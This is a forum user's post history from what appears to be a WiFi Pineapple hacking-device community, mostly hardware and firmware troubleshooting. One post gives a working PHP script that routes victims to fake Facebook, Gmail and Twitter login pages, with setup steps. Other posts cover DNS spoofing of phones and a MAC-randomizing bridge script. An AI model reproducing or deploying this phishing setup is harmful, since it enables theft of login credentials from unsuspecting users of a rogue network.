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Everything posted by PineDominator

  1. Great:-) Seb is it WM's code that you are planning on including into the firmware? currious
  2. the module shows you what is added/currently black or white listed. you could edit the file directly but why not do that in the module? when you save the list it shows you where the file lives at the top. but adding to that list does not black or white, you have to press the button to do that and or autostart as well editing a file with a list of ssid's or mac's will not actually black or white list them, the module exists because there is more to it than adding names to a file. I hope this helps explain
  3. thanks but all the work is def yours:-) btw you can also access the UI if connected to the same network wlan1 is by say
  4. Thank you so much for shareing:-D I made a mod to the bash script so it works better/quicker #!/bin/sh ifconfig wlan1 down macchanger -A wlan1 ifconfig wlan1 up #WPA2 wpa_supplicant -B -D nl80211 -i wlan1 -c /usb/wpa_supplicant.conf #WEP #iwconfig wlan1 mode managed key your_key_here #iwconfig wlan1 essid "your access point name here" #OPEN #iwconfig wlan1 essid "your access point name here" #Setup ipforwarding via iptables. echo 1 > /proc/sys/net/ipv4/ip_forward #Reset iptables iptables -F iptables -X iptables -A FORWARD -o wlan1 -i br-lan -s -m conntrack --ctstate NEW -jACCEPT iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT iptables -A POSTROUTING -t nat -j MASQUERADE #Wait for 6 seconds to give enough time for association. sleep 6 #Grab an ip via DHCP udhcpc -i wlan1 [/CODE] what I changed was I keep my wpa_supplicant.conf in /usb/ added ifconfig wlan1 up and sleep 6 before the dhcp process EDIT: added both WEP and OPEN commands, just uncomment and comment out the other:-) added random mac via macchanger -A wlan1 Great work Hackling:-D
  5. did u issue the command reboot through ssh or the ui? how about tying to unplug the power instead?
  6. this could be the sd card that came with the ducky, mine and a ton of others had to use there own/different one. no report from the hak shop why? others have reported even after using there own cards it has wrecked them as well?
  7. I don't know if anyone else is experiencing the forums going down? seems to last a couple minutes then is back up and running.
  8. MK3 is flashed through the ethernet port when the bootloader is loading up, so I can't see any problems of not being able to re-flash in case of problem. MK4 is flashed through the os when everything is loaded so diff storry if the os or settings are messed up. needs serial
  9. Ive had this happen by pressing too hard, by the way not that hard. there are 2 screws under the front feet, or try pressing on the plastic around the button
  10. also I noticed that the download count for modules has reset? I know that has happend in the past at least 2 times as well.
  11. this is awesome, just what the doctor ordered
  12. you could just put it in /www/phish/ but that would fill the little bit of memory the mk4 has and using the usb is a good standard. I did explain how to sym link;-) ln -s /usb/phish /www/phish [/CODE]
  13. does this one have telnet access? maybe you could set your wireless region that way?
  14. Just like what I did with my random roll php version 2 I thought I would start a post to get clean links for phishing. Clean links IE example.com and not example.com/phish/example.html change /www/index.php to <?php $ref = $_SERVER['HTTP_REFERER']; $phishFolder = "phish/"; # Folder where your phishing files exist, Sym link from usb thumb drive "ln -s /usb/phishing-folder /www/phish" $skipInclude = 0; if (strpos($ref, "facebook")){ $phishFile = "facebook.html"; } elseif (strpos($ref, "gmail")) { $phishFile = "gmail.html"; } elseif (strpos($ref, "twitter")) { $phishFile = "twitter.html"; } else { require('error.php'); $skipInclude = 1; } if ($skipInclude == 0) { include($phishFolder.$phishFile); } ?> [/CODE] then add your phish pages to your thumb drive to say /usb/phish/ you can sym link to the /www/ folder [CODE] ln -s /usb/phish /www/phish [/CODE] now I am expecting your phishing setup to look like this /usb/phish/example.html and the source files could go into a folder like /usb/phish/example/ however you want to manage them last thing to do is edit all the .html files so that any links to the source folder include the phish/ folder IE "/phish/example/banner.jpg" what do you guys think? is this how phishing should be done from now on?
  15. its most likely because your android is caching the dns lookup prior to the dnsspoof, I clear mine with 1 tap cleaner also unplugging/stopping ICS will force android to be dns spoofed, it sucks because not all or everyone will be redirected for every site.
  16. messing with the internal wifi will mess with karma/network. but what you can do is ifconfig mon.wlan0 down; ifconfig wlan0 down; ifconfig wlan0 up; airmon-ng start wlan0
  17. you will probably have to re-flash the firmware via ssh using these instructions http://cloud.wifipineapple.com/index.php?flashing manual upgrade
  18. you can change mac address for the external wifi adapters but to change the internal mac is going to mess with karma and wifi, I have played with figuring out a way to make it work together but still can't find a soulution? if someone has one? remember it may change the mac but then karma does not function.
  19. Ive had that on my windows 7 64bit, the other network is it detecting a hidden ssid, rebooting windows solved the issue of the ssid's that I was not probing for
  20. I know with apple iphones and touches there is a screen that pops up but that is actually a method apple uses to log in to those portal pages like at starbucks or hotel. could be that the latest version of mk4 is now allowing the apple servers through? does this happen when shareing internet with the mk4? try without internet.
  21. can you not see it when you ssh in "iwconfig" and bring it up with "ifconfig wlan1 up", you could lookup how to configure wpa suplicant to connect to a wpa wifi network.
  22. darren have you experimented with amplification like the 800mw one from alfa. I bet it would make that antenna and MK4 that much better.
  23. doesn't matter the internal wifi is debunk, def a problem
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